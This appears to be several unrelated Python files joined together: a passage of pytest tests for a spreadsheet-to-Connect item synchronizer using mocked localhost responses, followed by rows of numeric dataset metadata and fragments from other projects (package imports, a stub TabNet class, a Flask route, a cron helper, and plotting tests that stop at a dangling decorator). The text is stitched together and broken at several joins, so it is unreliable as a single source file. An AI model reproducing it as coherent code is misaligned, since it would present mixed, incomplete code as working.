    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Creating an item whose MPN already exists in Connect must fail."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    # Lookup by MPN returns an existing item, so the create must be refused.
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[mocked_items_response[0]],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    expected = (
        'Cannot create item: item with MPN `MPN-R-001` already exists with ID '
        '`PRD-276-377-545-0001`.'
    )
    assert errors == {2: [expected]}
def test_create_item_connect_exception(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """An HTTP 500 from the create endpoint is reported as a row error."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    # The POST fails server-side.
    mocked_responses.add(method='POST', url=items_url, status=500)
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {2: ['500 - Internal Server Error: unexpected error.']}
def test_create_item(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Happy path: a new item is created when the MPN is not in Connect."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    mocked_responses.add(
        method='POST',
        url=items_url,
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 1, 0)
    assert errors == {}
def test_create_item_one_time(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A `onetime` billing period item is created successfully."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['I2'].value = 'onetime'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    mocked_responses.add(
        method='POST',
        url=items_url,
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 1, 0)
    assert errors == {}
def test_create_item_yearly(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """An item with a `1 year` commitment is created successfully."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['J2'].value = '1 year'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    mocked_responses.add(
        method='POST',
        url=items_url,
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 1, 0)
    assert errors == {}
def test_create_item_1_to_1_yearly(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A `yearly` period with a matching `1 year` commitment creates fine."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['I2'].value = 'yearly'
    sheet['J2'].value = '1 year'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    mocked_responses.add(
        method='POST',
        url=items_url,
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 1, 0)
    assert errors == {}
def test_create_item_validate_commitment(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A commitment value outside the allowed set must be rejected."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['I2'].value = 'yearly'
    sheet['J2'].value = 'commitment'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    expected = (
        'the item `Commitment` must be one between `-`, `1 year`, `2 years`, `3 years`, '
        '`4 years`, `5 years`, not `commitment`.'
    )
    assert errors == {2: [expected]}
def test_create_item_validate_commitment_ppu(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A commitment is not allowed on `ppu` items."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['F2'].value = 'ppu'
    sheet['I2'].value = 'monthly'
    sheet['J2'].value = '1 year'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the commitment `1 year` is invalid for `ppu` items.'],
    }
def test_create_item_validate_commitment_onetime(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A commitment is not allowed on `onetime` items."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['F2'].value = 'reservation'
    sheet['I2'].value = 'onetime'
    sheet['J2'].value = '1 year'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the commitment `1 year` is invalid for `onetime` items.'],
    }
def test_create_item_validate_commitment_wrong_multiyear(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A `2 years` period only allows a `-` or `4 years` commitment."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['F2'].value = 'reservation'
    sheet['I2'].value = '2 years'
    sheet['J2'].value = '3 years'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    # NOTE: the double space before `not` reproduces the library's message
    # exactly as emitted.
    expected = (
        'for a billing period of `2 years` the commitment must be one between `-`, `4 years`, '
        ' not 3 years.'
    )
    assert errors == {2: [expected]}
def test_create_item_validate_commitment_wrong_multiyear_vs_commitment(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A `3 years` period only allows a `-` commitment."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['F2'].value = 'reservation'
    sheet['I2'].value = '3 years'
    sheet['J2'].value = '5 years'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['for a billing period of `3 years` the commitment must be `-`, not 5 years.'],
    }
def test_update_item(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Happy path: an existing item is updated via PUT."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'update'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[mocked_items_response[0]],
    )
    mocked_responses.add(
        method='PUT',
        url=f'{items_url}/PRD-276-377-545-0001',
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 1)
    assert errors == {}
def test_delete_item(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Happy path: an existing draft item is deleted via DELETE."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'delete'
    # Normalized from lowercase 'k2' for consistency with the other
    # coordinates in this file; openpyxl uppercases coordinates internally,
    # so the addressed cell is the same.
    sheet['K2'].value = 'draft'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[mocked_items_response[0]],
    )
    mocked_responses.add(
        method='DELETE',
        url=f'{items_url}/PRD-276-377-545-0001',
        json={},
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated, deleted) == (0, 0, 0, 1)
    assert errors == {}
def test_update_item_no_connect_item(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Updating an item whose MPN is not in Connect must fail."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'update'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['Cannot update item: item with MPN `MPN-R-001` the item does not exist.'],
    }
def test_update_item_no_item_connect(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Updating a missing MPN reports a row error.

    NOTE(review): this test appears to duplicate
    ``test_update_item_no_connect_item`` — consider removing one.
    """
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'update'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {2: ['Cannot update item: item with MPN `MPN-R-001` the item does not exist.']}
def test_update_item_draft(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """An item in `draft` status can be updated."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'update'
    draft_item = mocked_items_response[0]
    draft_item['status'] = 'draft'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[draft_item],
    )
    mocked_responses.add(
        method='PUT',
        url=f'{items_url}/PRD-276-377-545-0001',
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 1)
    assert errors == {}
def test_update_item_draft_ppu(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A draft `ppu` item can be updated."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'update'
    sheet['F2'].value = 'ppu'
    draft_item = mocked_items_response[0]
    draft_item['status'] = 'draft'
    draft_item['type'] = 'ppu'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[draft_item],
    )
    mocked_responses.add(
        method='PUT',
        url=f'{items_url}/PRD-276-377-545-0001',
        json=mocked_items_response[0],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 1)
    assert errors == {}
def test_update_item_draft_connect_exception(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """An HTTP 500 from the update endpoint is reported as a row error."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'update'
    draft_item = mocked_items_response[0]
    draft_item['status'] = 'draft'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[draft_item],
    )
    # The PUT fails server-side.
    mocked_responses.add(
        method='PUT',
        url=f'{items_url}/PRD-276-377-545-0001',
        status=500,
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {2: ['500 - Internal Server Error: unexpected error.']}
def test_delete_item_not_exists(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """Deleting an item whose MPN is not in Connect must fail."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'delete'
    # Normalized from lowercase 'k2' for consistency with the other
    # coordinates in this file; openpyxl uppercases coordinates internally,
    # so the addressed cell is the same.
    sheet['K2'].value = 'draft'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated, deleted) == (0, 0, 0, 0)
    # NOTE(review): the library reports "Cannot update item" even though the
    # requested action is `delete`; asserted as emitted.
    assert errors == {
        2: ['Cannot update item: item with MPN `MPN-R-001` the item does not exist.'],
    }
def test_delete_item_connect_error(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """An HTTP 500 from the delete endpoint is reported as a row error."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'delete'
    # Normalized from lowercase 'k2' for consistency with the other
    # coordinates in this file; openpyxl uppercases coordinates internally,
    # so the addressed cell is the same.
    sheet['K2'].value = 'draft'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[mocked_items_response[0]],
    )
    # The DELETE fails server-side.
    mocked_responses.add(
        method='DELETE',
        url=f'{items_url}/PRD-276-377-545-0001',
        status=500,
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated, deleted) == (0, 0, 0, 0)
    assert errors == {2: ['500 - Internal Server Error: unexpected error.']}
def test_create_item_custom_uom(
    fs,
    get_sync_items_env,
    mocked_responses,
    mocked_items_response,
):
    """A custom unit of measure triggers a unit creation before the item."""
    sheet = get_sync_items_env['Items']
    sheet['A2'].value = None
    sheet['C2'].value = 'create'
    sheet['H2'].value = 'unitary tests'
    workbook_path = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook_path)
    items_url = 'https://localhost/public/v1/products/PRD-276-377-545/items'
    mocked_responses.add(
        method='GET',
        url=f'{items_url}?eq(mpn,MPN-R-001)&limit=100&offset=0',
        json=[],
    )
    mocked_responses.add(
        method='POST',
        url=items_url,
        json=mocked_items_response[0],
    )
    # The custom unit of measure is registered through the settings endpoint.
    mocked_responses.add(
        method='POST',
        url='https://localhost/public/v1/settings/units',
        json={'id': '123'},
    )
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook_path, 'Items')
    skipped, created, updated, deleted, errors = synchronizer.sync()
    assert (skipped, created, updated) == (0, 1, 0)
    assert errors == {}
| 28.300501 | 100 | 0.62093 | 4,248 | 33,904 | 4.747175 | 0.038136 | 0.072746 | 0.0964 | 0.1205 | 0.951403 | 0.936279 | 0.933254 | 0.927998 | 0.910493 | 0.905683 | 0 | 0.035907 | 0.234427 | 33,904 | 1,197 | 101 | 28.324144 | 0.741023 | 0 | 0 | 0.819028 | 0 | 0.025853 | 0.24823 | 0.061556 | 0 | 0 | 0 | 0 | 0.140641 | 1 | 0.03516 | false | 0 | 0.003102 | 0 | 0.038263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7452c3405444a5b6e87f62f3e902148765833803 | 243 | py | Python | deepnodal/python/structures/__init__.py | Bhumbra/DeepNodal | 33afb2efa5e78ae6558ce60a36bb87c186c1f448 | [
"BSD-3-Clause"
] | 1 | 2019-01-06T09:49:42.000Z | 2019-01-06T09:49:42.000Z | deepnodal/python/structures/__init__.py | Bhumbra/DeepNodal | 33afb2efa5e78ae6558ce60a36bb87c186c1f448 | [
"BSD-3-Clause"
] | 3 | 2020-10-14T14:43:33.000Z | 2022-02-09T23:46:40.000Z | deepnodal/python/structures/__init__.py | Bhumbra/DeepNodal | 33afb2efa5e78ae6558ce60a36bb87c186c1f448 | [
"BSD-3-Clause"
] | null | null | null | from deepnodal.python.structures.link import *
from deepnodal.python.structures.chain import *
from deepnodal.python.structures.stream import *
from deepnodal.python.structures.level import *
from deepnodal.python.structures.network import *
| 34.714286 | 49 | 0.831276 | 30 | 243 | 6.733333 | 0.333333 | 0.321782 | 0.470297 | 0.717822 | 0.693069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 243 | 6 | 50 | 40.5 | 0.90991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
746ee4f5eb772e4ac02ce961f4bb11a941989a4f | 124 | py | Python | src/tabnet_lightning/regressor.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet_lightning/regressor.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet_lightning/regressor.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | import pytorch_lightning as pl
from tabnet import TabNet
class TabNetRegressor(pl.LightningModule):
# TODO
pass
| 12.4 | 42 | 0.758065 | 15 | 124 | 6.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201613 | 124 | 9 | 43 | 13.777778 | 0.939394 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
74a83dd59ae17afb9939d904d359d6a8d74f6afb | 180 | py | Python | web/controllers/h5learning/rotationUI.py | ZZh2333/myBlog | 88b7c903fbaa98b5e02ce25ebaeb70268dc6f825 | [
"MIT"
] | null | null | null | web/controllers/h5learning/rotationUI.py | ZZh2333/myBlog | 88b7c903fbaa98b5e02ce25ebaeb70268dc6f825 | [
"MIT"
] | null | null | null | web/controllers/h5learning/rotationUI.py | ZZh2333/myBlog | 88b7c903fbaa98b5e02ce25ebaeb70268dc6f825 | [
"MIT"
] | null | null | null | from . import route_h5learning
from flask import render_template
@route_h5learning.route('/rotationUI')
def rotationUI():
return render_template('/h5learning/rotationUI.html') | 30 | 57 | 0.805556 | 21 | 180 | 6.714286 | 0.52381 | 0.212766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018405 | 0.094444 | 180 | 6 | 57 | 30 | 0.846626 | 0 | 0 | 0 | 0 | 0 | 0.209945 | 0.149171 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
77ab75889326a9546706e8f99cfd26e7e7ad8c64 | 82 | py | Python | blogapp/crons.py | yan-jin/myblog | 05a0e89bbda56ce86d8e1701ed85e2f8aff7e90e | [
"MIT"
] | 1 | 2018-07-26T08:47:50.000Z | 2018-07-26T08:47:50.000Z | blogapp/crons.py | yan-jin/myblog | 05a0e89bbda56ce86d8e1701ed85e2f8aff7e90e | [
"MIT"
] | null | null | null | blogapp/crons.py | yan-jin/myblog | 05a0e89bbda56ce86d8e1701ed85e2f8aff7e90e | [
"MIT"
] | null | null | null | import blogapp.utils as utils
def get_new_data():
utils.get_new_hole_data()
| 13.666667 | 29 | 0.756098 | 14 | 82 | 4.071429 | 0.642857 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158537 | 82 | 5 | 30 | 16.4 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
77f65e13496acfa1cfdb9914c7a737560c17c4ae | 9,648 | py | Python | tests/test_plots.py | ngrion/apode | 59cab7cc85a7335f3ca0f8b9841481a90fd58aea | [
"MIT"
] | 2 | 2020-10-09T13:04:45.000Z | 2020-11-16T13:42:28.000Z | tests/test_plots.py | ngrion/apode | 59cab7cc85a7335f3ca0f8b9841481a90fd58aea | [
"MIT"
] | 45 | 2020-10-09T13:06:33.000Z | 2020-12-09T04:35:07.000Z | tests/test_plots.py | ngrion/apode | 59cab7cc85a7335f3ca0f8b9841481a90fd58aea | [
"MIT"
] | 1 | 2020-11-24T11:46:58.000Z | 2020-11-24T11:46:58.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the
# Apode Project (https://github.com/mchalela/apode).
# Copyright (c) 2020, Néstor Grión and Sofía Sappia
# License: MIT
# Full Text: https://github.com/ngrion/apode/blob/master/LICENSE.txt
from unittest import mock
from apode import datasets
from apode import plots
from matplotlib.testing.decorators import check_figures_equal
import numpy as np
import pytest
# =============================================================================
# TESTS COMMON
# =============================================================================
@check_figures_equal()
def test_default_call(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300, mu=1, nbin=None)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="r")
exp_ax = fig_ref.subplots()
ad.plot(method="lorenz", ax=exp_ax, alpha="r")
def test_invalid():
ad = datasets.make_uniform(seed=42, size=300, mu=1, nbin=None)
with pytest.raises(AttributeError):
ad.plot("foo")
# =============================================================================
# TESTS LORENZ
# =============================================================================
@check_figures_equal()
def test_plot_relative_lorenz(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="r")
exp_ax = fig_ref.subplots()
df = ad.plot._lorenz_data(alpha="r")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Cumulative % of variable")
exp_ax.set_title("Lorenz Curve")
@check_figures_equal()
